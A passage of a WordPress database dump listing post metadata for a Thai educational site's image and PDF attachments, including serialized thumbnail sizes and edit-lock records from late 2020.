(26890, 10859, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/261163-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"261163-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"261163-04-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"261163-04-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"261163-04-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"261163-04-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26891, 10860, '_wp_attached_file', '2020/11/261163-05.jpg'),
(26892, 10860, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/261163-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"261163-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"261163-05-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"261163-05-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"261163-05-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"261163-05-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26893, 10861, '_wp_attached_file', '2020/11/261163-03.jpg'),
(26894, 10861, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/261163-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"261163-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"261163-03-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"261163-03-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"261163-03-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"261163-03-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26895, 10862, '_wp_attached_file', '2020/11/261163-02.jpg'),
(26896, 10862, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/261163-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"261163-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"261163-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"261163-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"261163-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"261163-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26897, 10863, '_wp_attached_file', '2020/11/261163-01.jpg'),
(26898, 10863, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/11/261163-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"261163-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"261163-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"261163-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"261163-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"261163-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26899, 10858, '_thumbnail_id', '10863'),
(26902, 10858, '_hide_featured', NULL),
(26905, 10865, '_edit_lock', '1606359220:14'),
(26906, 10865, '_edit_last', '14'),
(26907, 10865, '_thumbnail_id', '10862'),
(26910, 10865, '_hide_featured', NULL),
(26913, 10867, '_edit_lock', '1606359148:14'),
(26914, 10867, '_edit_last', '14'),
(26915, 10867, '_thumbnail_id', '10861'),
(26918, 10867, '_hide_featured', NULL),
(26921, 10869, '_edit_lock', '1606359170:14'),
(26922, 10869, '_edit_last', '14'),
(26923, 10869, '_thumbnail_id', '10859'),
(26926, 10869, '_hide_featured', NULL),
(26931, 10871, '_edit_lock', '1606359196:14'),
(26932, 10871, '_edit_last', '14'),
(26933, 10871, '_thumbnail_id', '10860'),
(26936, 10871, '_hide_featured', NULL),
(26967, 10873, '_edit_lock', '1607050715:14'),
(26968, 10873, '_edit_last', '14'),
(26969, 10874, '_wp_attached_file', '2020/11/ช่างไฟฟ้าและงานหลักสูตร.pdf'),
(26972, 10873, '_hide_featured', NULL),
(26975, 10878, '_edit_lock', '1608799362:14'),
(26976, 10878, '_edit_last', '14'),
(26977, 10879, '_wp_attached_file', '2020/12/20201203082136420.pdf'),
(26978, 10880, '_wp_attached_file', '2020/12/20201203082114918.pdf'),
(26981, 10878, '_hide_featured', NULL),
(26986, 10882, '_edit_lock', '1606961226:14'),
(26987, 10882, '_edit_last', '14'),
(26988, 10883, '_wp_attached_file', '2020/12/20201203082136420-1.pdf'),
(26991, 10882, '_hide_featured', NULL),
(26996, 10886, '_edit_lock', '1607050948:14'),
(26997, 10886, '_edit_last', '14'),
(26998, 10887, '_wp_attached_file', '2020/12/รับสมัครไฟฟ้า.pdf'),
(27001, 10886, '_hide_featured', NULL),
(27004, 10889, '_edit_lock', '1607313947:14'),
(27005, 10889, '_edit_last', '14'),
(27006, 10890, '_wp_attached_file', '2020/12/07126308.jpg'),
(27007, 10890, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/12/07126308.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07126308-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07126308-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07126308-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07126308-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07126308-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27008, 10891, '_wp_attached_file', '2020/12/07126307.jpg'),
(27009, 10891, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/12/07126307.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07126307-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07126307-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07126307-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07126307-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07126307-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27010, 10892, '_wp_attached_file', '2020/12/07126306.jpg'),
(27011, 10892, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/12/07126306.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07126306-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07126306-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07126306-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07126306-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07126306-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27012, 10893, '_wp_attached_file', '2020/12/07126305.jpg'),
(27013, 10893, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/12/07126305.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07126305-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07126305-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07126305-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07126305-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07126305-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27014, 10894, '_wp_attached_file', '2020/12/07126304.jpg'),
(27015, 10894, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/12/07126304.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07126304-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07126304-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07126304-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07126304-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07126304-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27016, 10895, '_wp_attached_file', '2020/12/07126303.jpg'),
(27017, 10895, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/12/07126303.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07126303-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07126303-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07126303-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07126303-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07126303-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27018, 10896, '_wp_attached_file', '2020/12/07126302.jpg'),
(27019, 10896, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/12/07126302.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07126302-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07126302-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07126302-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07126302-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07126302-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27020, 10897, '_wp_attached_file', '2020/12/07126301.jpg'),
(27021, 10897, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/12/07126301.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07126301-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07126301-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07126301-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07126301-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07126301-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27022, 10889, '_thumbnail_id', '10897'),
(27025, 10889, '_hide_featured', NULL),
(27030, 10899, '_edit_lock', '1607314023:14'),
(27031, 10899, '_edit_last', '14'),
(27032, 10899, '_thumbnail_id', '10896'),
(27035, 10899, '_hide_featured', NULL),
(27040, 10901, '_edit_lock', '1607314087:14'),
(27041, 10901, '_edit_last', '14'),
(27042, 10901, '_thumbnail_id', '10895'),
(27045, 10901, '_hide_featured', NULL),
(27050, 10903, '_edit_lock', '1607314141:14'),
(27051, 10903, '_edit_last', '14'),
(27052, 10903, '_thumbnail_id', '10894'),
(27055, 10903, '_hide_featured', NULL),
(27058, 10905, '_edit_lock', '1607314212:14'),
(27059, 10905, '_edit_last', '14'),
(27060, 10905, '_thumbnail_id', '10893'),
(27063, 10905, '_hide_featured', NULL),
(27066, 10907, '_edit_lock', '1607314356:14'),
(27067, 10907, '_edit_last', '14'),
(27068, 10907, '_thumbnail_id', '10892'),
(27071, 10907, '_hide_featured', NULL),
(27074, 10909, '_edit_lock', '1607314608:14'),
(27075, 10909, '_edit_last', '14'),
(27076, 10909, '_thumbnail_id', '10891'),
(27079, 10909, '_hide_featured', NULL),
(27084, 10912, '_edit_lock', '1607314731:14'),
(27085, 10912, '_edit_last', '14'),
(27086, 10912, '_thumbnail_id', '10890'),
(27089, 10912, '_hide_featured', NULL),
(27092, 10915, '_wp_attached_file', '2020/12/1.jpg'),
(27093, 10915, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:13:\"2020/12/1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27094, 10916, '_wp_attached_file', '2020/12/2.jpg'),
(27095, 10916, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:13:\"2020/12/2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"2-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"2-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"2-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27096, 10917, '_wp_attached_file', '2020/12/3.jpg'),
